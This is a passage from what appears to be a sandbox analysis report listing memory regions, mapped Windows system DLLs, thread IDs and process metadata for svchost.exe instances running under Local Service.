entry_point = 0x0 region_type = private name = "private_0x0000005c78800000" filename = "" Region: id = 14228 start_va = 0x5c78900000 end_va = 0x5c789fffff entry_point = 0x0 region_type = private name = "private_0x0000005c78900000" filename = "" Region: id = 14229 start_va = 0x5c78a00000 end_va = 0x5c78afffff entry_point = 0x0 region_type = private name = "private_0x0000005c78a00000" filename = "" Region: id = 14230 start_va = 0x5c78b00000 end_va = 0x5c78efffff entry_point = 0x0 region_type = private name = "private_0x0000005c78b00000" filename = "" Region: id = 14231 start_va = 0x5c78f00000 end_va = 0x5c79004fff entry_point = 0x0 region_type = private name = "private_0x0000005c78f00000" filename = "" Region: id = 14232 start_va = 0x5c79010000 end_va = 0x5c7910ffff entry_point = 0x0 region_type = private name = "private_0x0000005c79010000" filename = "" Region: id = 14233 start_va = 0x5c79110000 end_va = 0x5c7920ffff entry_point = 0x0 region_type = private name = "private_0x0000005c79110000" filename = "" Region: id = 14234 start_va = 0x5c79250000 end_va = 0x5c79256fff entry_point = 0x0 region_type = private name = "private_0x0000005c79250000" filename = "" Region: id = 14235 start_va = 0x5c79400000 end_va = 0x5c794fffff entry_point = 0x0 region_type = private name = "private_0x0000005c79400000" filename = "" Region: id = 14236 start_va = 0x5c79500000 end_va = 0x5c795fffff entry_point = 0x0 region_type = private name = "private_0x0000005c79500000" filename = "" Region: id = 14237 start_va = 0x5c79700000 end_va = 0x5c797fffff entry_point = 0x0 region_type = private name = "private_0x0000005c79700000" filename = "" Region: id = 14238 start_va = 0x5c79900000 end_va = 0x5c799fffff entry_point = 0x0 region_type = private name = "private_0x0000005c79900000" filename = "" Region: id = 14239 start_va = 0x5c79a00000 end_va = 0x5c79afffff entry_point = 0x0 region_type = private name = "private_0x0000005c79a00000" filename = "" Region: id = 14240 start_va = 0x5c79b00000 end_va = 0x5c79bfffff entry_point = 0x0 region_type = private name = "private_0x0000005c79b00000" filename = "" Region: id = 14241 start_va = 0x5c79c00000 end_va = 0x5c79cfffff entry_point = 0x0 region_type = private name = "private_0x0000005c79c00000" filename = "" Region: id = 14242 start_va = 0x5c79d00000 end_va = 0x5c79dfffff entry_point = 0x0 region_type = private name = "private_0x0000005c79d00000" filename = "" Region: id = 14243 start_va = 0x5c79e00000 end_va = 0x5c79efffff entry_point = 0x0 region_type = private name = "private_0x0000005c79e00000" filename = "" Region: id = 14244 start_va = 0x5c79f00000 end_va = 0x5c79ffffff entry_point = 0x0 region_type = private name = "private_0x0000005c79f00000" filename = "" Region: id = 14245 start_va = 0x5c7a300000 end_va = 0x5c7a3fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a300000" filename = "" Region: id = 14246 start_va = 0x5c7a400000 end_va = 0x5c7a4fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a400000" filename = "" Region: id = 14247 start_va = 0x5c7a500000 end_va = 0x5c7a5fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a500000" filename = "" Region: id = 14248 start_va = 0x5c7a600000 end_va = 0x5c7a6fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a600000" filename = "" Region: id = 14249 start_va = 0x5c7a700000 end_va = 0x5c7a7fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a700000" filename = "" Region: id = 14250 start_va = 0x5c7a800000 end_va = 0x5c7a8fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a800000" filename = "" Region: id = 14251 start_va = 0x5c7a900000 end_va = 0x5c7a9fffff entry_point = 0x0 region_type = private name = "private_0x0000005c7a900000" filename = "" Region: id = 14252 start_va = 0x5c7aa00000 end_va = 0x5c7aafffff entry_point = 0x0 region_type = private name = "private_0x0000005c7aa00000" filename = "" Region: id = 14253 start_va = 0x5c7ab00000 end_va = 0x5c7abfffff entry_point = 0x0 region_type = private name = "private_0x0000005c7ab00000" filename = "" Region: id = 14254 start_va = 0x5c7ac00000 end_va = 0x5c7adb4fff entry_point = 0x0 region_type = private name = "private_0x0000005c7ac00000" filename = "" Region: id = 14255 start_va = 0x7df5ff890000 end_va = 0x7ff5ff88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff890000" filename = "" Region: id = 14256 start_va = 0x7ff7b34d8000 end_va = 0x7ff7b34d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34d8000" filename = "" Region: id = 14257 start_va = 0x7ff7b34da000 end_va = 0x7ff7b34dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34da000" filename = "" Region: id = 14258 start_va = 0x7ff7b34dc000 end_va = 0x7ff7b34ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34dc000" filename = "" Region: id = 14259 start_va = 0x7ff7b34de000 end_va = 0x7ff7b34dffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34de000" filename = "" Region: id = 14260 start_va = 0x7ff7b34e0000 end_va = 0x7ff7b34e1fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34e0000" filename = "" Region: id = 14261 start_va = 0x7ff7b34e2000 end_va = 0x7ff7b34e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34e2000" filename = "" Region: id = 14262 start_va = 0x7ff7b34e4000 end_va = 0x7ff7b34e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34e4000" filename = "" Region: id = 14263 start_va = 0x7ff7b34e6000 end_va = 0x7ff7b34e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34e6000" filename = "" Region: id = 14264 start_va = 0x7ff7b34ea000 end_va = 0x7ff7b34ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34ea000" filename = "" Region: id = 14265 start_va = 0x7ff7b34ec000 end_va = 0x7ff7b34edfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b34ec000" filename = "" Region: id = 14266 start_va = 0x7ff7b34f0000 end_va = 0x7ff7b35effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b34f0000" filename = "" Region: id = 14267 start_va = 0x7ff7b35f0000 end_va = 0x7ff7b3612fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b35f0000" filename = "" Region: id = 14268 start_va = 0x7ff7b3613000 end_va = 0x7ff7b3614fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3613000" filename = "" Region: id = 14269 start_va = 0x7ff7b3617000 end_va = 0x7ff7b3618fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3617000" filename = "" Region: id = 14270 start_va = 0x7ff7b3619000 end_va = 0x7ff7b361afff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3619000" filename = "" Region: id = 14271 start_va = 0x7ff7b361b000 end_va = 0x7ff7b361cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b361b000" filename = "" Region: id = 14272 start_va = 0x7ff7b361d000 end_va = 0x7ff7b361dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b361d000" filename = "" Region: id = 14273 start_va = 0x7ff7b361e000 end_va = 0x7ff7b361ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b361e000" filename = "" Region: id = 14274 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 14275 start_va = 0x7ffbeaf80000 end_va = 0x7ffbeb01dfff entry_point = 0x7ffbeaf80000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 14276 start_va = 0x7ffbf23d0000 end_va = 0x7ffbf23dffff entry_point = 0x7ffbf23d0000 region_type = mapped_file name = "pcadm.dll" filename = "\\Windows\\System32\\pcadm.dll" (normalized: "c:\\windows\\system32\\pcadm.dll") Region: id = 14277 start_va = 0x7ffbf2650000 end_va = 0x7ffbf26a7fff entry_point = 0x7ffbf2650000 region_type = mapped_file name = "ncbservice.dll" filename = "\\Windows\\System32\\ncbservice.dll" (normalized: "c:\\windows\\system32\\ncbservice.dll") Region: id = 14278 start_va = 0x7ffbf2c00000 end_va = 0x7ffbf2c0efff entry_point = 0x7ffbf2c00000 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 14279 start_va = 0x7ffbf5200000 end_va = 0x7ffbf5242fff entry_point = 0x7ffbf5200000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 14280 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 14281 start_va = 0x7ffbf7ae0000 end_va = 0x7ffbf7aeafff entry_point = 0x7ffbf7ae0000 region_type = mapped_file name = "systemeventsbrokerclient.dll" filename = "\\Windows\\System32\\SystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerclient.dll") Region: id = 14282 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 14283 start_va = 0x7ffbf9350000 end_va = 0x7ffbf9371fff entry_point = 0x7ffbf9350000 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 14284 start_va = 0x7ffbf98a0000 end_va = 0x7ffbf99b2fff entry_point = 0x7ffbf98a0000 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 14285 start_va = 0x7ffbf9a20000 end_va = 0x7ffbf9a9ffff entry_point = 0x7ffbf9a20000 region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 14286 start_va = 0x7ffbf9f60000 end_va = 0x7ffbf9f7cfff entry_point = 0x7ffbf9f60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 14287 start_va = 0x7ffbfa220000 end_va = 0x7ffbfa25efff entry_point = 0x7ffbfa220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 14288 start_va = 0x7ffbfbb30000 end_va = 0x7ffbfbb38fff entry_point = 0x7ffbfbb30000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 14289 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 14290 start_va = 0x7ffbfcb60000 end_va = 0x7ffbfcb92fff entry_point = 0x7ffbfcb60000 region_type = mapped_file name = "wudfplatform.dll" filename = "\\Windows\\System32\\WUDFPlatform.dll" (normalized: "c:\\windows\\system32\\wudfplatform.dll") Region: id = 14291 start_va = 0x7ffbfcba0000 end_va = 0x7ffbfcbbafff entry_point = 0x7ffbfcba0000 region_type = mapped_file name = "wudfsvc.dll" filename = "\\Windows\\System32\\WUDFSvc.dll" (normalized: "c:\\windows\\system32\\wudfsvc.dll") Region: id = 14292 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 14293 start_va = 0x7ffbfd740000 end_va = 0x7ffbfd7b1fff entry_point = 0x7ffbfd740000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 14294 start_va = 0x7ffbfd7c0000 end_va = 0x7ffbfd809fff entry_point = 0x7ffbfd7c0000 region_type = mapped_file name = "audioendpointbuilder.dll" filename = "\\Windows\\System32\\AudioEndpointBuilder.dll" (normalized: "c:\\windows\\system32\\audioendpointbuilder.dll") Region: id = 14295 start_va = 0x7ffbfd9f0000 end_va = 0x7ffbfdaaffff entry_point = 0x7ffbfd9f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 14296 start_va = 0x7ffbfdbe0000 end_va = 0x7ffbfdbebfff entry_point = 0x7ffbfdbe0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 14297 start_va = 0x7ffbfdd90000 end_va = 0x7ffbfdda6fff entry_point = 0x7ffbfdd90000 region_type = mapped_file name = "portabledeviceconnectapi.dll" filename = "\\Windows\\System32\\PortableDeviceConnectApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll") Region: id = 14298 start_va = 0x7ffbfddb0000 end_va = 0x7ffbfde50fff entry_point = 0x7ffbfddb0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 14299 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14300 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14301 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 14302 start_va = 0x7ffbfeb20000 end_va = 0x7ffbfeb5efff entry_point = 0x7ffbfeb20000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 14303 start_va = 0x7ffbfec30000 end_va = 0x7ffbfecf7fff entry_point = 0x7ffbfec30000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 14304 start_va = 0x7ffbff0d0000 end_va = 0x7ffbff147fff entry_point = 0x7ffbff0d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 14305 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 14306 start_va = 0x7ffbffad0000 end_va = 0x7ffbffaebfff entry_point = 0x7ffbffad0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 14307 start_va = 0x7ffbffbe0000 end_va = 0x7ffbffc11fff entry_point = 0x7ffbffbe0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 14308 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 14309 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14310 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14311 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 14312 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14313 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14314 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14315 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14316 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14317 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14318 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14319 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14320 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 14321 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14322 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 14323 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 14324 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 14325 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14326 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14327 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14328 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14329 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 14330 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14331 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14332 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14333 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14334 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14335 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14336 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14337 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14338 start_va = 0x7ffc03b40000 end_va = 0x7ffc03baefff entry_point = 0x7ffc03b40000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 14339 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14340 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14341 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14342 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1232 os_tid = 0xc94 Thread: id = 1233 os_tid = 0xc88 Thread: id = 1234 os_tid = 0xb60 Thread: id = 1235 os_tid = 0x940 Thread: id = 1236 os_tid = 0x924 Thread: id = 1237 os_tid = 0x920 Thread: id = 1238 os_tid = 0x7a0 Thread: id = 1239 os_tid = 0x5f4 Thread: id = 1240 os_tid = 0x5f0 Thread: id = 1241 os_tid = 0x5e0 Thread: id = 1242 os_tid = 0x418 Thread: id = 1243 os_tid = 0x190 Thread: id = 1244 os_tid = 0x164 Thread: id = 1245 os_tid = 0x3c4 Thread: id = 1246 os_tid = 0x3bc Thread: id = 1247 os_tid = 0x34c Process: id = "285" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x28ee9000" os_pid = "0x360" os_integrity_level = "0x4000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BthHFSrv" [0xa], "NT SERVICE\\FDResPub" [0xa], "NT SERVICE\\QWAVE" [0xa], "NT SERVICE\\SCardSvr" [0xa], "NT SERVICE\\SensrSvc" [0xa], "NT SERVICE\\SSDPSRV" [0xa], "NT SERVICE\\TimeBroker" [0xe], "NT SERVICE\\upnphost" [0xa], "NT SERVICE\\wcncsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000df86" [0xc000000f], "LOCAL" [0x7] Region: id = 14536 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14537 start_va = 0xfb6020000 end_va = 0xfb602ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb6020000" filename = "" Region: id = 14538 start_va = 0xfb6030000 end_va = 0xfb6030fff entry_point = 0xfb6030000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 14539 start_va = 0xfb6040000 end_va = 0xfb6053fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb6040000" filename = "" Region: id = 14540 start_va = 0xfb6060000 end_va = 0xfb60dffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6060000" filename = "" Region: id = 14541 start_va = 0xfb60e0000 end_va = 0xfb60e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb60e0000" filename = "" Region: id = 14542 start_va = 0xfb60f0000 end_va = 0xfb60f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb60f0000" filename = "" Region: id = 14543 start_va = 0xfb6100000 end_va = 0xfb6101fff entry_point = 0x0 region_type = private name = "private_0x0000000fb6100000" filename = "" Region: id = 14544 start_va = 0xfb6190000 end_va = 0xfb6196fff entry_point = 0x0 region_type = private name = "private_0x0000000fb6190000" filename = "" Region: id = 14545 start_va = 0xfb61a0000 end_va = 0xfb61a0fff entry_point = 0x0 region_type = private name = "private_0x0000000fb61a0000" filename = "" Region: id = 14546 start_va = 0xfb61b0000 end_va = 0xfb61b0fff entry_point = 0x0 region_type = private name = "private_0x0000000fb61b0000" filename = "" Region: id = 14547 start_va = 0xfb61c0000 end_va = 0xfb61c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb61c0000" filename = "" Region: id = 14548 start_va = 0xfb61d0000 end_va = 0xfb61d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb61d0000" filename = "" Region: id = 14549 start_va = 0xfb6200000 end_va = 0xfb62fffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6200000" filename = "" Region: id = 14550 start_va = 0xfb6300000 end_va = 0xfb63bdfff entry_point = 0xfb6300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14551 start_va = 0xfb63c0000 end_va = 0xfb647ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb63c0000" filename = "" Region: id = 14552 start_va = 0xfb6490000 end_va = 0xfb6496fff entry_point = 0x0 region_type = private name = "private_0x0000000fb6490000" filename = "" Region: id = 14553 start_va = 0xfb6500000 end_va = 0xfb65fffff entry_point = 0x0 region_type = private name = "private_0x0000000fb6500000" filename = "" Region: id = 14554 start_va = 0xfb6600000 end_va = 0xfb6787fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000fb6600000" filename = "" Region: id = 14555 start_va = 0xfb6790000 end_va = 